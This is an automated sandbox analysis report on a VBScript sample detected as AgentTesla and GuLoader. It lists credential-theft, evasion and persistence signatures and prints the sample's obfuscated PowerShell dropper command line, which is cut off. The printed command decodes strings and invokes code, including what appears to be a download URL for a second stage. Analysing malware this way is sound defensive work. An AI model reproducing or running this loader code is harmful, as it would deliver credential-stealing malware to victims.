Edit tour
Windows
Analysis Report
G4-TODOS.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1516 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\G4-TO DOS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4632 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Utmmelig heds = 1;$ Skimme='Su bstrin';$S kimme+='g' ;Function Fritidsmul igheds($Ud rejseforbu ddene){$Va letism=$Ud rejseforbu ddene.Leng th-$Utmmel igheds;For ($Syring=5 ; $Syring -lt $Valet ism; $Syri ng+=(6)){$ Fundamenta lismen+=$U drejseforb uddene.$Sk imme.Invok e($Syring, $Utmmelig heds);}$Fu ndamentali smen;}func tion Exube rate($Lavr ss){&($Arb ejdsvrelse r) ($Lavrs s);}$Flokk ede=Fritid smuligheds ' FeltM D umpoholdfz TorreiDdsf jl Ihukl.e nnaa trol/ Hydro5 Bys t.Mosdy0,y rin Hoved( KrydsWMode rinat.inHv ntrdFagopo Hapt wIndv es Si.e Sp rinNbakkeT Afsyn Smuk k1Spids0 F lue. Garg0 Coper;Le.t e KahiWBr. ndiIodo.nY ndet6 uls4 nonco;Heir e s.inkxSy nsh6 Bier4 Lgeu ; Kar a BojsdrAk tievP.ege: Krige1Tan. p2Ha.de1Ov erm.Enhus0 Propi) tag e NargiGSt ilheEg,trc Dclasken,o soSvnig/Ty km.2Svang0 Oks,p1Para c0para.0G. lva1 Bull0 Jasmi1Over . DikerF b adeiConcer Bra,eUnde rfDepaioby ggexTange/ Unis1Phar m2 Atr.1 T j n. hens0 Homop ';$M edicopsych ological=F ritidsmuli gheds ' Be flUAgi,ns Lac eOve,f rPolya-apo teAWardegt re ceSa,ke nPo.tot,wi st ';$Infe ction=Frit idsmulighe ds ',ingmh Modhat afm gtdissop c ilis Au,o: Flamb/ Sek u/ ,elnd E xtrrUds,yi Paragv Pse ue Fati.dr owngEvigho Br.ttoOrg, ngKrakelMi kroeUndep. Fo micAffa loPanermWe eg/Van bu Tiresc Usr p?DecoleP. enyx An.lp ProduoFoot lrSpooftBa and= Slutd ch.huoFo,s kwBeic,n F orhlPictoo .uropaLagr idopsam&Vi ndeiCommed Missi=Upbl a1John,HCo ldnPRavnem betjeR Ber WKn.glX n stedTrforw TrninNCari oI Trbe6Sp ortXCount5 vvefgErhv eYskuess S weemColpeI H,len9Kand ivSign.6Ta rmreSkimoK Co,ciJTvan gz BegiI E ntrt Met,1 BugleGA ge l-retretpr og.t erve ';$Noncomb ustible173 =Fritidsmu ligheds 'B otet>Trskn ';$Arbejd svrelser=F ritidsmuli gheds 'Sel viiSupereI n skxBredb ';$Museum sgenstande ='Haplessn esses';Exu berate (Fr itidsmulig heds 'Rust fSR ppeeUn quotPa,as- LnforCReub eoSmovsntr anstTweene CostnBesa ntScler Ej nar-ElectP UnaddaLobe ltFlusthAf hng ilitTN eigh:Unlar \ Gul S,on inoBeha,mA heyrbTrial e .remrPes tii footsr eno.hGylte . Nutlt V. luxDa.nitC igar Mi.k- Rt sVLind aaSta.nlCa valu Iliae Fun,t Godm o$ UltrMHi m eu.affes KlarleDelf uEkspamSa lams Lommg BencheHnse sn resisL, mbetClevea PatenSter idPistoeSc rei;Su,fe ');Exubera te (Fritid smuligheds ' a,niiDe ndrfFortr I.raf(Elef atUnspieSk i.dsTermit Tid,e-Li i epSmiggaTa l ht Overh Gulv u,te T Rors:T.a um\ScarlSf lyttoTilhy mCame,bUnc ,aeHaandrS yri.iTer i s UhaahBio ry.Retint lumixProbi t Rrlg) Ex pi{ConcleR edbuxf.der i GalmtC.o rt} Ledd;. ksam ');$c haussebrol gningens = Fritidsmu ligheds 'c han.erenti cWh.elhmya rioO ist F ibr%Lgnera edlgpGrsr opMyrekdKa pitaLivsvt